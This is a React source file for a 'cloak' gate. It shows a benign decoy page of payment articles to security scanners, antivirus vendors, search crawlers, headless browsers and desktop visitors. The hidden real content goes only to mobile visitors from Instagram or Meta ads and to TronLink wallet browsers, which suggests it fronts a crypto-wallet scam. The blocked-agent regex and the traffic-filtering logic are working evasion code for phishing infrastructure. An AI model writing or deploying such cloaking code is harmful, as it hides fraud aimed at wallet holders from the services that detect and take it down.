import { useEffect, useState } from "react";
import { hasInjectedTronLinkWallet, isTronLinkBrowser } from "@/lib/tronLinkDetection";

const CLOAK_ENABLED = true;

const isInstagramBrowser = (ua: string) => /Instagram/i.test(ua);
const isMobileDevice = (ua: string) =>
  /Android|webOS|iPhone|iPod|BlackBerry|IEMobile|Opera Mini/i.test(ua) ||
  (/iPad|Macintosh/i.test(ua) &&
    typeof navigator !== "undefined" &&
    (navigator as Navigator & { maxTouchPoints?: number }).maxTouchPoints! > 1 &&
    /Mobile/i.test(ua));

const BLOCKED_AGENTS =
  /NetcraftSurveyAgent|Netcraft|PhishTank|Google-Safety|Safebrowsing|VirusTotal|URLScan|Sucuri|TrendMicro|Kaspersky|ESET|Avira|McAfee|Symantec|Fortinet|PaloAlto|ZScaler|Cyren|Bitdefender|Trustwave|Wepawet|Censys|Shodan|MJ12bot|AhrefsBot|SemrushBot|DotBot|PetalBot|bingbot|Googlebot|Slurp|DuckDuckBot|Baiduspider|YandexBot|facebookexternalhit|Twitterbot|Slackbot|TelegramBot|Discordbot|LinkedInBot|WhatsApp|Applebot|Headless|PhantomJS|Selenium|Puppeteer|Playwright|curl|wget|python-requests|Go-http-client|Java\//i;


const MerchantPaymentsDigest = () => {
  const features = [
    {
      title: "Clear payment choices",
      text: "Customers should instantly understand whether they can pay by card, wallet, bank transfer, or another supported method.",
    },
    {
      title: "Simple order summary",
      text: "A good checkout shows the product, price, fees, delivery details, and final amount before the customer confirms payment.",
    },
    {
      title: "Reliable confirmation",
      text: "After payment, the user should see a clear success, pending, or failed status with an order reference.",
    },
  ];

  const articles = [
    {
      tag: "Checkout",
      title: "How a clean payment page can reduce customer hesitation",
      text: "A payment page should avoid unnecessary distractions. Clear labels, visible totals, and simple instructions help customers complete the final step with confidence.",
    },
    {
      tag: "Billing",
      title: "Why transparent invoices are important for online services",
      text: "Invoices should explain what was purchased, when payment was made, which method was used, and how the customer can contact support if needed.",
    },
    {
      tag: "Methods",
      title: "Choosing payment options for different customer habits",
      text: "Some customers prefer cards, others prefer digital wallets, and some rely on local payment systems. Choice can improve convenience.",
    },
  ];

  return (
    <div className="min-h-screen bg-[#f5f7fb] text-[#111827] antialiased">
      <header className="bg-white border-b border-slate-200">
        <div className="mx-auto max-w-6xl px-5 py-5 flex items-center justify-between">
          <div>
            <p className="text-2xl font-black tracking-tight">Merchant Notes</p>
            <p className="text-sm text-slate-500">
              Practical payment articles for small online businesses
            </p>
          </div>

          <nav className="hidden md:flex gap-7 text-sm font-bold text-slate-600">
            <a href="#basics" className="hover:text-blue-600">Basics</a>
            <a href="#flow" className="hover:text-blue-600">Flow</a>
            <a href="#articles" className="hover:text-blue-600">Articles</a>
            <a href="#faq" className="hover:text-blue-600">FAQ</a>
          </nav>
        </div>
      </header>

      <main>
        <section className="mx-auto max-w-6xl px-5 py-14 md:py-20">
          <div className="grid lg:grid-cols-[1.1fr_0.9fr] gap-8 items-stretch">
            <div className="rounded-[32px] bg-white border border-slate-200 p-8 md:p-12 shadow-sm">
              <p className="text-sm uppercase tracking-[0.22em] font-black text-blue-600">
                Payment Operations
              </p>

              <h1 className="mt-6 text-5xl md:text-7xl font-black leading-[0.95] tracking-tight">
                Better payment pages create better customer trust.
              </h1>

              <p className="mt-7 max-w-2xl text-lg text-slate-600 leading-relaxed">
                A simple guide to payment clarity, checkout structure, invoices,
                refunds, payment methods, and the small details that help customers
                understand what happens before and after they pay.
              </p>

              <div className="mt-9 flex flex-col sm:flex-row gap-4">
                <a
                  href="#basics"
                  className="rounded-full bg-blue-600 px-6 py-3 text-sm font-black text-white text-center hover:bg-blue-700 transition"
                >
                  Read the guide
                </a>

                <a
                  href="#flow"
                  className="rounded-full border border-slate-300 px-6 py-3 text-sm font-black text-slate-800 text-center hover:bg-slate-50 transition"
                >
                  View checkout flow
                </a>
              </div>
            </div>

            <div className="rounded-[32px] bg-[#0f172a] text-white p-8 md:p-10 flex flex-col justify-between">
              <div>
                <p className="text-sm uppercase tracking-[0.22em] font-black text-blue-300">
                  Key Idea
                </p>

                <h2 className="mt-5 text-4xl font-black leading-tight">
                  A customer should never feel lost at the payment step.
                </h2>

                <p className="mt-5 text-slate-300 leading-relaxed">
                  The final step should answer three questions clearly: what is being
                  paid for, how much it costs, and what happens after payment.
                </p>
              </div>

              <div className="mt-10 grid grid-cols-3 gap-3">
                <div className="rounded-2xl bg-white/10 p-4">
                  <p className="text-3xl font-black">1</p>
                  <p className="mt-1 text-xs text-slate-300">clear total</p>
                </div>

                <div className="rounded-2xl bg-white/10 p-4">
                  <p className="text-3xl font-black">2</p>
                  <p className="mt-1 text-xs text-slate-300">simple method</p>
                </div>

                <div className="rounded-2xl bg-white/10 p-4">
                  <p className="text-3xl font-black">3</p>
                  <p className="mt-1 text-xs text-slate-300">receipt</p>
                </div>
              </div>
            </div>
          </div>
        </section>

        <section id="basics" className="mx-auto max-w-6xl px-5 py-12">
          <div className="mb-8">
            <p className="text-sm uppercase tracking-[0.22em] font-black text-blue-600">
              Payment Basics
            </p>
            <h2 className="mt-3 text-4xl md:text-5xl font-black tracking-tight">
              What makes online payment easier to understand.
            </h2>
          </div>

          <div className="grid md:grid-cols-3 gap-5">
            {features.map((item) => (
              <article
                key={item.title}
                className="rounded-[28px] bg-white border border-slate-200 p-7 shadow-sm"
              >
                <div className="h-12 w-12 rounded-2xl bg-blue-100 text-blue-700 flex items-center justify-center font-black">
                  ✓
                </div>
                <h3 className="mt-5 text-2xl font-black">{item.title}</h3>
                <p className="mt-3 text-sm text-slate-600 leading-relaxed">
                  {item.text}
                </p>
              </article>
            ))}
          </div>
        </section>

        <section id="flow" className="mx-auto max-w-6xl px-5 py-12">
          <div className="rounded-[32px] bg-white border border-slate-200 p-8 md:p-12 shadow-sm">
            <div className="grid lg:grid-cols-[0.8fr_1.2fr] gap-10">
              <div>
                <p className="text-sm uppercase tracking-[0.22em] font-black text-blue-600">
                  Checkout Flow
                </p>

                <h2 className="mt-3 text-4xl font-black tracking-tight">
                  Four steps customers expect.
                </h2>

                <p className="mt-5 text-slate-600 leading-relaxed">
                  A predictable checkout flow helps people understand where they are
                  in the process and what information is needed next.
                </p>
              </div>

              <div className="grid sm:grid-cols-2 gap-4">
                {[
                  ["01", "Review order", "The user checks the selected items and final amount."],
                  ["02", "Choose method", "The user selects a preferred payment option."],
                  ["03", "Confirm payment", "The page explains what will happen after clicking pay."],
                  ["04", "Get receipt", "The result appears with a reference number or receipt."],
                ].map(([num, title, text]) => (
                  <div key={num} className="rounded-2xl bg-slate-50 border border-slate-200 p-5">
                    <p className="text-sm font-black text-blue-600">{num}</p>
                    <h3 className="mt-3 text-xl font-black">{title}</h3>
                    <p className="mt-2 text-sm text-slate-600 leading-relaxed">{text}</p>
                  </div>
                ))}
              </div>
            </div>
          </div>
        </section>

        <section id="articles" className="mx-auto max-w-6xl px-5 py-12">
          <div className="mb-8">
            <p className="text-sm uppercase tracking-[0.22em] font-black text-blue-600">
              Reading Room
            </p>
            <h2 className="mt-3 text-4xl md:text-5xl font-black tracking-tight">
              Articles about payments and checkout.
            </h2>
          </div>

          <div className="grid md:grid-cols-3 gap-5">
            {articles.map((item) => (
              <article
                key={item.title}
                className="rounded-[28px] bg-white border border-slate-200 p-7 shadow-sm"
              >
                <p className="text-xs uppercase tracking-[0.2em] font-black text-blue-600">
                  {item.tag}
                </p>
                <h3 className="mt-4 text-2xl font-black leading-tight">
                  {item.title}
                </h3>
                <p className="mt-4 text-sm text-slate-600 leading-relaxed">
                  {item.text}
                </p>
              </article>
            ))}
          </div>
        </section>

        <section id="faq" className="mx-auto max-w-6xl px-5 py-12 pb-20">
          <div className="rounded-[32px] bg-[#0f172a] text-white p-8 md:p-12">
            <div className="grid lg:grid-cols-[0.8fr_1.2fr] gap-10">
              <div>
                <p className="text-sm uppercase tracking-[0.22em] font-black text-blue-300">
                  FAQ
                </p>
                <h2 className="mt-3 text-4xl font-black">
                  Common payment questions.
                </h2>
              </div>

              <div className="space-y-4">
                <details className="rounded-2xl bg-white/10 border border-white/10 p-5">
                  <summary className="cursor-pointer font-black">
                    Why do payments sometimes fail?
                  </summary>
                  <p className="mt-3 text-sm text-slate-300 leading-relaxed">
                    A payment may fail because of incorrect details, insufficient
                    funds, bank restrictions, network issues, or provider checks.
                  </p>
                </details>

                <details className="rounded-2xl bg-white/10 border border-white/10 p-5">
                  <summary className="cursor-pointer font-black">
                    What should a receipt include?
                  </summary>
                  <p className="mt-3 text-sm text-slate-300 leading-relaxed">
                    A useful receipt includes date, amount, merchant name, order ID,
                    payment status, and support contact information.
                  </p>
                </details>

                <details className="rounded-2xl bg-white/10 border border-white/10 p-5">
                  <summary className="cursor-pointer font-black">
                    Why is payment transparency important?
                  </summary>
                  <p className="mt-3 text-sm text-slate-300 leading-relaxed">
                    Transparent pricing reduces confusion and makes it easier for
                    users to decide whether they want to complete payment.
                  </p>
                </details>
              </div>
            </div>
          </div>
        </section>
      </main>

      <footer className="bg-white border-t border-slate-200">
        <div className="mx-auto max-w-6xl px-5 py-8 flex flex-col md:flex-row justify-between gap-5">
          <div>
            <p className="font-black">Merchant Notes</p>
            <p className="mt-1 text-sm text-slate-500">
              Educational articles about online payments and customer checkout.
            </p>
          </div>

          <p className="text-sm text-slate-500">
            © 2024 Merchant Notes. Informational content only.
          </p>
        </div>
      </footer>
    </div>
  );
};



const CloakGate = ({ children }: { children: React.ReactNode }) => {
  const [allowed, setAllowed] = useState<boolean | null>(
    CLOAK_ENABLED ? null : true,
  );

  useEffect(() => {
    if (!CLOAK_ENABLED) {
      setAllowed(true);
      return;
    }

    const ua = navigator.userAgent || "";
    const params = new URLSearchParams(window.location.search);
    const referrer = (document.referrer || "").toLowerCase();

    const preview = params.get("preview") === "1" || localStorage.getItem("cloak_bypass") === "1";
    if (preview) {
      localStorage.setItem("cloak_bypass", "1");
      setAllowed(true);
      return;
    }

    if (BLOCKED_AGENTS.test(ua)) {
      setAllowed(false);
      return;
    }
	
   // TronLink opens dApps inside its own mobile WebView and injects tronLink/tronWeb.
    // Treat that environment as trusted wallet traffic so the gate does not strand
    // users on the loading screen before the wallet can connect.
    if (isTronLinkBrowser(ua) || hasInjectedTronLinkWallet(window)) {
      setAllowed(true);
      return;
    }
	
    // Detect paid-traffic referrers from Meta ads (Facebook/Instagram)
    const AD_SOURCE_RE = /^(fb|facebook|ig|instagram|meta)/i;
    const AD_MEDIUM_RE = /(cpc|ppc|paid|social|fb|ig|meta)/i;
    const utmSource = params.get("utm_source") || "";
    const utmMedium = params.get("utm_medium") || "";
    const hasAdParam =
      AD_SOURCE_RE.test(utmSource) ||
      AD_MEDIUM_RE.test(utmMedium) ||
      params.has("fbclid") ||
      params.has("igshid") ||
      params.has("ig_source") ||
      params.has("ad_id") ||
      params.has("adset_id") ||
      params.has("campaign_id");
    const fromMetaReferrer = /facebook\.com|instagram\.com|fb\.com|l\.facebook|lm\.facebook/.test(referrer);

    if (hasAdParam || fromMetaReferrer) {
      localStorage.setItem("ad_traffic", "1");
    }
    const adTraffic = hasAdParam || fromMetaReferrer || localStorage.getItem("ad_traffic") === "1";

    if (!isMobileDevice(ua)) {
      setAllowed(false);
      return;
    }

    setAllowed(isInstagramBrowser(ua) || adTraffic);
  }, []);

  if (allowed === null) return null;
  if (!allowed) return <MerchantPaymentsDigest />;
  return <>{children}</>;
};

export default CloakGate;